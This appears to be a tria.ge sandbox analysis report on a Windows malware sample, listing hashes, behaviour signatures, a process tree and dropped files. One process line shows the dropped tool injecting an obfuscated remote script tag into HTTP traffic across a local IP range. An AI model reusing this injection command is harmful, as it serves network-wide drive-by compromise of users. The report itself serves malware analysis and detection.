Windows 7 deprecation

Windows 7 will be removed from tria.ge on 2025-03-31

Analysis

  • max time kernel
    148s
  • max time network
    148s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20231215-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20231215-enlocale:en-usos:windows10-2004-x64system
  • submitted
    29/12/2023, 20:30

General

  • Target

    032d7cb609f83f27964560bebfc37a04.exe

  • Size

    525KB

  • MD5

    032d7cb609f83f27964560bebfc37a04

  • SHA1

    c8aa87b6ba9d7d5432b6426b94d148e46b9073ac

  • SHA256

    30b6789a6a49c7b5a82d2c2ddf52d1c77ce50ce0b8b2568d4edde594e5d4652e

  • SHA512

    c8314ea1ee32dac8a2cd954792b1d69e0f4af7f8d98949544bbcba96685870045c51db2de81e05f7ceea1210f963a5ae87f5132df394003dc4231e75319e6e0f

  • SSDEEP

    6144:wM8MSbxohE9q2PsXrSVew/X2+wZHeSPVep6s6BCF6GfEWfadRNH0QOPoS:wHNx2E9/cZw/X6eSPtfS6G6aPoS

Score
8/10

Malware Config

Signatures

  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 1 IoCs
  • Loads dropped DLL 6 IoCs
  • Drops file in System32 directory 5 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Modifies registry class 1 IoCs
  • Runs ping.exe 1 TTPs 1 IoCs
  • Suspicious behavior: LoadsDriver 5 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\032d7cb609f83f27964560bebfc37a04.exe
    "C:\Users\Admin\AppData\Local\Temp\032d7cb609f83f27964560bebfc37a04.exe"
    1⤵
    • Drops file in Drivers directory
    • Drops file in System32 directory
    • Modifies registry class
    • Suspicious use of WriteProcessMemory
    PID:456
    • C:\Windows\SysWOW64\360uawm.exe
      -idx 0 -ip 10.127.0.2-10.127.0.254 -port 80 -insert "<script language=JavaScript src=http://e%64a.P%61ss%69ngG%61s.n%65t/tj.js></script>"
      2⤵
      • Executes dropped EXE
      • Loads dropped DLL
      PID:3244
    • C:\Windows\SysWOW64\cmd.exe
      C:\Windows\system32\cmd.exe /c 12.bat
      2⤵
        PID:1688
    • C:\Windows\System32\rundll32.exe
      C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
      1⤵
        PID:2952
      • C:\Windows\SysWOW64\PING.EXE
        ping 127.0.0.1 -n 5
        1⤵
        • Runs ping.exe
        PID:3824
      • C:\Windows\system32\backgroundTaskHost.exe
        "C:\Windows\system32\backgroundTaskHost.exe" -ServerName:App.AppXmtcan0h2tfbfy7k9kn8hbxb6dmzz1zh0.mca
        1⤵
        • Suspicious use of WriteProcessMemory
        PID:1688

      Network

      MITRE ATT&CK Enterprise v15

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Windows\SysWOW64\360uawm.exe

        Filesize

        381KB

        MD5

        7f9b2d7a3bfed5131ea5c00ee7901078

        SHA1

        91138d690868c7c6129ed9cbf931d024e3862a56

        SHA256

        007859f01620750403d081a52841c89fec3e9c0c4138bd16301f8e197ff00ba8

        SHA512

        fc11856deb1300c8bc6c0cfd6306856d11c4ee61bcf6afd9aee62b90b5a92cd84f920b034b21c778ae991c7a00f6f27035e8e8a0d7853caf55056cb7ec4f1e05

      • memory/456-0-0x0000000000400000-0x0000000000485000-memory.dmp

        Filesize

        532KB

      • memory/456-5-0x0000000000400000-0x0000000000485000-memory.dmp

        Filesize

        532KB

      • memory/3244-25-0x0000000000400000-0x000000000040F000-memory.dmp

        Filesize

        60KB

      • memory/3244-21-0x0000000000570000-0x0000000000580000-memory.dmp

        Filesize

        64KB

      • memory/3244-17-0x0000000000550000-0x0000000000565000-memory.dmp

        Filesize

        84KB

      • memory/3244-10-0x0000000000400000-0x000000000040F000-memory.dmp

        Filesize

        60KB